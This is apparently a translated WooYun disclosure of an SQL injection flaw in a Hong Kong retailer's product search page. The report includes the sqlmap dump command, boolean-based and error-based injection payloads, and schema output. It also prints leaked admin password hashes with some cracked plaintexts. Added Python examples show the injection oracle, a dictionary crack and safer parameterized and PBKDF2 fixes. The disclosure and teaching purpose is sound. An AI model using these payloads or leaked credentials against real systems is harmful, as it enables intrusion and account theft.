
Vulnerability summary

Defect ID: wooyun-2015-0156619

Title: SQL injection in Baby Country (admin password leak) (Hong Kong region)

Vendor: Baby Country

Author: 路人甲

Submitted: 2015-12-01 11:26

Fixed: 2016-01-15 16:22

Published: 2016-01-15 16:22

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: referred to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-01: Details sent to the vendor; awaiting vendor action
2015-12-01: Vendor confirmed; details visible to the vendor only
2015-12-11: Details opened to core white hats and relevant domain experts
2015-12-21: Details opened to regular white hats
2015-12-31: Details opened to intern white hats
2016-01-15: Details opened to the public

Brief description:

SQL injection in a Baby Country web page (admin password leak): the searchkey parameter of searchproducts.php is injectable, and the t_user table, including the administrator password hashes, can be dumped.

Detailed description:

URL: http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=

$ python sqlmap.py -u "http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=" -p searchkey --technique=BE --random-agent --batch  -D hkbaby_pos -T t_user -C mName,mPassword,mTel,mEmail,mMobile_Phone --dump


Database: hkbaby_pos
Table: t_user
[6 entries]
+-------------------+---------------------------------------------+---------+---------+---------------+
| mName             | mPassword                                   | mTel    | mEmail  | mMobile_Phone |
+-------------------+---------------------------------------------+---------+---------+---------------+
| Administrator     | b8369ee75671dcdc385aa51b268d6c42            | NULL    | NULL    | NULL          |
| Administrator     | 6E4BA784DC5EB7D6004D5A241246D60F            | <blank> | <blank> | <blank>       |
| 101               | 38B3EFF8BAF56627478EC76A704E9B52 (101)      | <blank> | <blank> | <blank>       |
| 108               | A3C65C2974270FD093EE8A9BF8AE7D0B (108)      | <blank> | <blank> | <blank>       |
| Central Logistics | D41D8CD98F00B204E9800998ECF8427E ()         | <blank> | <blank> | <blank>       |
| 技術支援          | B911D003A4B0252F650671B38EAD7FB1 (pericles) | <blank> | <blank> | <blank>       |
+-------------------+---------------------------------------------+---------+---------+---------------+

Proof of vulnerability:

---
Parameter: searchkey (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'='
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
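Both payloads above work because searchkey is pasted into a LIKE '%...%' literal. The script below is an added example, not code from the report or from the affected site: it rebuilds that query shape over an in-memory SQLite table, replays the report's boolean-based payload and its false twin through it, and places the parameterized query that makes both inert next to it. The table and column names (t_product, mCategory, mName) and the exact statement in searchproducts.php are assumptions; the page never shows the application source. SQLite stands in for MySQL, which is fine for the boolean-based payload since it uses no DBMS-specific functions.

```python
"""Added example, not code from the report or from the affected site: the
searchkey payloads replayed against the query shape they imply, next to the
parameterized query that defeats them.

Assumed (not shown on the page): the table/column names t_product, mCategory,
mName, and that searchproducts.php concatenates searchkey into LIKE '%...%'.
SQLite stands in for MySQL; the boolean-based payload is DBMS-neutral.
"""
import sqlite3

# Constructed sample rows, loosely modelled on the t_product table in the dump.
SAMPLE_ROWS = [
    ("BtmC", "Bottom cap, small"),
    ("BtmC", "Bottom cap, large"),
    ("Toys", "Rattle"),
]

# The boolean-based blind payload from the report and its false twin. Each one
# closes the open '%...' literal, appends a condition, then re-opens a literal
# so that the template's trailing %' is absorbed into a harmless '%'='%'.
TRUE_PAYLOAD = "%' AND 3158=3158 AND '%'='"
FALSE_PAYLOAD = "%' AND 3158=3159 AND '%'='"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_product (mCategory TEXT, mName TEXT)")
    conn.executemany("INSERT INTO t_product VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_sql(cat, searchkey):
    """String concatenation, the way the injectable page evidently builds it."""
    return ("SELECT mName FROM t_product WHERE mCategory = '" + cat + "' "
            "AND mName LIKE '%" + searchkey + "%'")


def search_vulnerable(conn, cat, searchkey):
    return [row[0] for row in conn.execute(build_vulnerable_sql(cat, searchkey))]


def search_fixed(conn, cat, searchkey):
    """Bound parameters: the input never leaves the string value, so the
    payload is searched for as literal text and matches nothing."""
    sql = "SELECT mName FROM t_product WHERE mCategory = ? AND mName LIKE ?"
    return [row[0] for row in conn.execute(sql, (cat, "%" + searchkey + "%"))]


def blind_oracle(conn, cat):
    """Run both payloads through both queries. A difference between the true
    and false results is exactly the one-bit oracle sqlmap's boolean-based
    blind technique reads, one comparison at a time, to extract data."""
    return {
        "vulnerable_true": search_vulnerable(conn, cat, TRUE_PAYLOAD),
        "vulnerable_false": search_vulnerable(conn, cat, FALSE_PAYLOAD),
        "fixed_true": search_fixed(conn, cat, TRUE_PAYLOAD),
        "fixed_false": search_fixed(conn, cat, FALSE_PAYLOAD),
    }


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("BtmC", TRUE_PAYLOAD))
    for name, rows in blind_oracle(db, "BtmC").items():
        print(f"{name}: {rows}")
```

The concatenated query returns every BtmC row for the true payload and nothing for the false one; that difference, repeated once per character of each value sqlmap wants, is how the whole t_user table is read out without any error message. The parameterized query returns nothing for either payload, because the quotes and the AND clauses stay inside the bound value. The error-based payload is not portable to SQLite: it is the MySQL duplicate-key trick, where COUNT(*) grouped on FLOOR(RAND(0)*2) raises a "Duplicate entry" error whose message carries the selected value between the markers 0x71716b6b71 ("qqkkq") and 0x71627a7671 ("qbzvq"), so sqlmap reads results straight out of the error text. Both techniques disappear with bound parameters, whereas a WAF only blocks the payload shapes it already knows.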
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'hkbabywebsite@%'
current user is DBA: False
database management system users [1]:
[*] 'hkbabywebsite'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1495 |
| SESSION_VARIABLES | 512 |
| GLOBAL_VARIABLES | 497 |
| GLOBAL_STATUS | 403 |
| SESSION_STATUS | 403 |
| STATISTICS | 302 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| KEY_COLUMN_USAGE | 202 |
| PARTITIONS | 147 |
| TABLES | 147 |
| TABLE_CONSTRAINTS | 136 |
| PLUGINS | 46 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| SCHEMA_PRIVILEGES | 16 |
| ENGINES | 9 |
| INDEX_STATISTICS | 7 |
| TABLE_STATISTICS | 6 |
| SCHEMATA | 2 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: hkbaby_pos
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| t_product_tx | 3787 |
| t_invoice_detail | 2115 |
| t_product_stock | 1955 |
| t_invoice | 1340 |
| t_invoice_moneycurrency | 1327 |
| t_invoice_paytype | 1327 |
| t_customer | 1322 |
| t_update | 1157 |
| t_product_barcode | 1001 |
| t_product | 829 |
| t_product_pricegroup | 805 |
| t_usergroup_right | 624 |
| log_info | 475 |
| t_supplier_invoice_in_detail | 447 |
| t_trading_invoice_detail | 443 |
| t_log | 355 |
| t_trading_invoice | 171 |
| t_stock_adjustment_in_detail | 162 |
| t_stocktake_detail | 162 |
| t_wishlist | 126 |
| t_brand | 91 |
| t_category | 75 |
| t_supplier_invoice_in | 74 |
| t_size | 22 |
| t_supplier | 21 |
| t_color | 16 |
| t_paytype | 8 |
| t_website | 7 |
| t_user | 6 |
| t_labelbarcode | 4 |
| t_usergroup | 4 |
| t_moneycurrency | 3 |
| t_stock | 3 |
| ad_right | 2 |
| t_groupdiscount | 2 |
| t_sc | 2 |
| t_station | 2 |
| t_unit | 2 |
| t_company | 1 |
| t_stock_adjustment_in | 1 |
| t_stocktake | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hkbaby_pos
Table: t_company_onetimedicount
[1 column]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| mPassword | varchar(255) |
+-----------+--------------+
Database: hkbaby_pos
Table: t_company
[1 column]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| mFtp_Password | varchar(255) |
+---------------+--------------+
Database: hkbaby_pos
Table: t_user
[1 column]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| mPassword | varchar(255) |
+-----------+--------------+
Database: hkbaby_pos
Table: t_company
[1 entry]
+---------------+
| mFtp_Password |
+---------------+
| NULL |
+---------------+
Database: hkbaby_pos
Table: t_user
[6 entries]
+---------------------------------------------+
| mPassword |
+---------------------------------------------+
| 38B3EFF8BAF56627478EC76A704E9B52 (101) |
| 6E4BA784DC5EB7D6004D5A241246D60F |
| A3C65C2974270FD093EE8A9BF8AE7D0B (108) |
| b8369ee75671dcdc385aa51b268d6c42 |
| B911D003A4B0252F650671B38EAD7FB1 (pericles) |
| D41D8CD98F00B204E9800998ECF8427E () |
+---------------------------------------------+
Database: hkbaby_pos
Table: t_company_onetimedicount
[0 entries]
+-----------+
| mPassword |
+-----------+
+-----------+
Database: hkbaby_pos
Table: t_user
[13 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| mAddress | mediumtext |
| mCode | varchar(255) |
| mDepartment | varchar(255) |
| mEmail | varchar(255) |
| mFax | varchar(255) |
| mMobile_Phone | varchar(255) |
| mName | varchar(255) |
| mNon_Active | smallint(6) |
| mPassword | varchar(255) |
| mRemarks | mediumtext |
| mTel | varchar(255) |
| mUserGroup_Code | varchar(255) |
| T_User_ID | int(11) |
+-----------------+--------------+
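Every mPassword value in the dump is a bare 32-hex-digit string, and sqlmap has already annotated four of the six with the recovered plaintext in parentheses; D41D8CD98F00B204E9800998ECF8427E is the MD5 of the empty string, so that account has no password at all. The script below is an added example, not code from the report or from the application: it runs a dictionary check over the six dumped hashes with a small constructed wordlist, then shows the salted, iterated storage (PBKDF2-HMAC-SHA256 via hashlib) that would have left the dump unusable without a separate brute force per user. The wordlist and the record format are assumptions for illustration.

```python
"""Added example, not code from the report or the application: what an
unsalted-MD5 mPassword column hands an attacker, beside salted iterated
storage that would not.
"""
import hashlib
import hmac
import os

# The six mPassword values from the dump (user -> hash). The second
# Administrator row is keyed "Administrator (row 2)" only to keep the dict unique.
DUMPED_HASHES = {
    "Administrator": "b8369ee75671dcdc385aa51b268d6c42",
    "Administrator (row 2)": "6E4BA784DC5EB7D6004D5A241246D60F",
    "101": "38B3EFF8BAF56627478EC76A704E9B52",
    "108": "A3C65C2974270FD093EE8A9BF8AE7D0B",
    "Central Logistics": "D41D8CD98F00B204E9800998ECF8427E",
    "技術支援": "B911D003A4B0252F650671B38EAD7FB1",
}

# Constructed wordlist for the example: each user name, the empty string and a
# few common choices. A real attack uses a large list or precomputed tables.
WORDLIST = ["", "101", "108", "admin", "password", "123456", "pericles"]


def crack_unsalted_md5(hashes, words):
    """Dictionary attack against unsalted MD5. One digest per candidate word is
    compared against every user at once, because without a per-user salt all
    users who chose the same password share the same digest. Returns
    user -> recovered plaintext (None where the wordlist had no hit)."""
    table = {hashlib.md5(w.encode("utf-8")).hexdigest(): w for w in words}
    return {user: table.get(h.lower()) for user, h in hashes.items()}


# --- What the column should have held instead --------------------------------
ITERATIONS = 200_000  # PBKDF2 work factor; raise as hardware allows


def store_password(password, iterations=ITERATIONS):
    """Salted, iterated PBKDF2-HMAC-SHA256. Record format (an assumption for
    this example): iterations$salt$digest, all hex. Each call draws a fresh
    16-byte salt, so two users with the same password get different records."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{iterations}${salt.hex()}${digest.hex()}"


def verify_password(stored, password):
    """Recompute with the stored salt and iteration count; compare in constant
    time so timing does not leak how many digest bytes matched."""
    iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    for user, plain in crack_unsalted_md5(DUMPED_HASHES, WORDLIST).items():
        print(f"{user:<22} {'not in wordlist' if plain is None else repr(plain)}")
    record = store_password("pericles")
    print(record)
    print(verify_password(record, "pericles"), verify_password(record, "Pericles"))
```

With unsalted MD5 the cost of attacking all six accounts is the cost of attacking one, and two of them (the staff code 101 and 108 accounts) used their own user name as the password. With a per-user salt and a work factor, each account has to be attacked separately and each guess costs hundreds of thousands of hash operations instead of one, which is the property that keeps a leaked table from turning into a leaked set of logins. A memory-hard function such as scrypt or Argon2 is preferable where available; PBKDF2 is used here because hashlib ships it everywhere.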

Remediation:

Put a WAF in front of it.

Copyright notice: when reposting, credit the source 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Rank: 6

Confirmed: 2015-12-01 16:21

Vendor reply:

Referred to related parties.

Latest status:

None yet